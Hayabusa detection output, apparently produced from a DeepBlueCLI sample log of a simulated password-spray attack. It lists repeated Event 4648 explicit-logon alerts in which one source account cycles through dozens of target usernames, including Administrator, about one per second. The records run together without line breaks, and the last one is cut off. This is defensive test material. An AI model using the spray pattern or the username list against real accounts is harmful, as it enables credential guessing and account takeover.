DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 